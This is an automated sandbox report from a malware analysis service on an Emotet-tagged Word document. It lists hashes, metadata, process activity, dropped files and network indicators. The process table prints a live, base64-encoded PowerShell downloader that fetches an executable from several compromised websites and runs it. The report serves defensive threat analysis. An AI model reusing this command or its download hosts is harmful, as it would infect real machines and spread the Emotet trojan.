analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Report.doc

Full analysis: https://app.any.run/tasks/5788a647-6abb-4f87-b444-492bde931f1f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 14, 2019, 17:20:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Expressway, Subject: Rubber, Author: Wilhelm Reynolds, Keywords: Ergonomic Rubber Cheese, Comments: integrated, Template: Normal.dotm, Last Saved By: Imani Kreiger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:06:00 2019, Last Saved Time/Date: Mon Oct 14 15:06:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0
MD5:

634FB174EB760789B41E3AE8EF70AD7A

SHA1:

6DAEAA9B5DE6145D811BF995CB541FBF4213D71B

SHA256:

8027F994B15A87A2979B7BC3D2859FE870F4E48390F4111A8CB2A5BDEC3ADE87

SSDEEP:

3072:6qfzpFOKgdzSrGpKyIwLx3kV3ggo7V1FjDQJ1dLHHRBgD:6qfzpFOKUzSGnLx3kgjirnvg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3716)

    • Creates files in the user directory

      • powershell.exe (PID: 3716)

    • Executed via WMI

      • powershell.exe (PID: 3716)

  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 3716)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 960)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Parker
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 203
Paragraphs: 1
Lines: 1
Company: Carter - Mohr
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 174
Words: 30
Pages: 1
ModifyDate: 2019:10:14 14:06:00
CreateDate: 2019:10:14 14:06:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Imani Kreiger
Template: Normal.dotm
Comments: integrated
Keywords: Ergonomic Rubber Cheese
Author: Wilhelm Reynolds
Subject: Rubber
Title: Expressway
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
960"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Report.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3716powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADAANQA1ADAAZgAyAGUANQA2AGQAZABjAD0AJwBhADAAeAAxAGUANwA3AGIAOAA1ADEAZAA0ACcAOwAkAGEAMAB4AGIAMgBjAGMANwBkADAAMgAzADkAIAA9ACAAJwAzADEANwAnADsAJABhADAAeAA5ADkAOABmADEAOAA0ADIAMgBlADMAZgA9ACcAYQAwAHgAYgBhADUANQBmADAAMwBiAGUAMwBiADIAMQBkAGEAJwA7ACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgAyAGMAYwA3AGQAMAAyADMAOQArACcALgBlAHgAZQAnADsAJABhADAAeAAwADQAOQA4ADUAZAA3AGIANQA3AD0AJwBhADAAeAAyAGEAOAAxAGQAZABhAGMANwA1AGIAMgBlACcAOwAkAGEAMAB4ADIAZQAyADUAOQBhADcAOAA4ADQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBMAEkARQBOAHQAOwAkAGEAMAB4ADYANwBkAGEANwBmADkAOAAyADYANgA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAZwBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEsAbAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBlAHIAYwBlAGsAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADEAZQBrADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBwAHUAcwBtAGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA0AGYAMgBjADgALwAqAGgAdAB0AHAAcwA6AC8ALwB2AHAAcwAzADMAMwAuAGMAbwBtAC8AMAA3AGgAMwAxAC8AMQBnAGoAeQA5AC8AKgBoAHQAdABwADoALwAvAG4AdQB0AHQAbABlAGYAaQBiAGUAcgBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBJAEQAQwBhAE8ALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAMwBmADcANwA4ADIANwAzAGEAYwA0ADUAZAA9ACcAYQAwAHgAOQA4ADAAYgBjADgAMwAxADMAZgBmACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACAAaQBuACAAJABhADAAeAA2ADcAZABhADcAZgA5ADgAMgA2ADYAKQB7AHQAcgB5AHsAJABhADAAeAAyAGUAMgA1ADkAYQA3ADgAOAA0AC4AIgBEAE8AYABXAGAATgBMAE8AQQBgAGQARgBpAGwAZQAiACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACwAIAAkAGEAMAB4ADkAYQAyAGIANQBhADEAMwAzADgAZgA1ADAAKQA7ACQAYQAwAHgAYQA4ADcAYQBhADgANABjAGUAMAA5AGMAPQAnAGEAMAB4AGQANAA4ADcAZABlAGQAYgAzADEAMgBlACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAApAC4AIgBMAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMAAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABhADAAeAA5AGEAMgBiADUAYQAxADMAMwA4AGYANQAwACkAOwAkAGEAMAB4AGUAMwA3ADgAMAA3ADgAMgA1AGEAYgA0ADkAZQBiAD0AJwBhADAAeABmADAAMAA2AGMAYgA4ADIANAAyAGYANQA1ADgAYwAnADsAYgByAGUAYQBrADsAJABhADAAeABkAGEAOQAwAGMANABmAGEAZgBlAGMAPQAnAGEAMAB4AGUAZgBjAGEAMwBkAGEAOQAxADgAZgA2AGIANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAAwADIAZQA4ADUAMAAxAGUANgAyAGIAMQBiAGQAYwA9ACcAYQAwAHgAZQA0AGYAOQBhADQAZQAxAGEAYwAyACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 154
Read events
1 312
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA87F.tmp.cvr
MD5:
SHA256:
3716powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGER12DZ6DQHPPYMHPPE.temp
MD5:
SHA256:
960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAE2913C.wmfwmf
MD5:451CCEC4E80B63056C7CF44829B810BB
SHA256:595D2B89005D0DCEECD29F64ADDF470CC69655E5C891713277D0A30BDE29FB66
960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14FCD6AA.wmfwmf
MD5:2EED3F8E631BCCE318BE8B4AC8FC2F8A
SHA256:0634DCDFEB01C38C45867535C142801F51A44D0848E28E883447E00A11CC0FF6
960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CCB12.wmfwmf
MD5:46243598CFCA7B4DE308E6E240E2304E
SHA256:7C507E3B0F47BF6E6CD4A6D16B2ED373F587D0B822D42D645728BB269D20B1DB
960WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Report.doc.LNKlnk
MD5:6F9D4EC83961B17A8EBF41D1A3005F50
SHA256:27BD71F82111F147E56A3CC6E48C4EFD216D76824D3380BAB6566B1CDF704A26
960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27B5ECF0.wmfwmf
MD5:E277012212BE3BCEA8C46356205FDFDB
SHA256:633B58C0DC4C70A2468B84E5C1C6FAD82260D41E1A92051878473D0F20AE7CD1
960WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CD2805DEB24A441BA9466FB0D3D77392
SHA256:9AFA3B2D5AB87B1B00646B7B67818D015F82E4AB373CDE74536F4870809D3137
960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE9A7B64.wmfwmf
MD5:1F0883953E0ED2453BF029CE85412531
SHA256:1FB621CF1AB0D3FF6592B9F20FB8FCBCEFA4BEB5363190796D7CED7A74AEE676
960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:30CBE5E535C4F181884515A89AC51856
SHA256:B5B5E76D494C195EEFE2B0A0E08914F37780E4F6ACEA9D4F2E8A94A246D7BE1D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3716
powershell.exe
GET
404
35.196.42.152:80
http://nuttlefiberart.com/wp-admin/eIDCaO/
US
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3716
powershell.exe
104.27.142.41:443
www.merceko.com
Cloudflare Inc
US
unknown
3716
powershell.exe
78.142.210.165:443
kampusmania.com
JSC Mediasoft ekspert
RU
unknown
3716
powershell.exe
35.196.42.152:80
nuttlefiberart.com
Google Inc.
US
unknown
3716
powershell.exe
161.117.183.16:443
vps333.com
SG
unknown
3716
powershell.exe
104.31.95.133:443
filegst.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
filegst.com
  • 104.31.95.133
  • 104.31.94.133
unknown
www.merceko.com
  • 104.27.142.41
  • 104.27.143.41
unknown
kampusmania.com
  • 78.142.210.165
unknown
vps333.com
  • 161.117.183.16
unknown
nuttlefiberart.com
  • 35.196.42.152
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Report.doc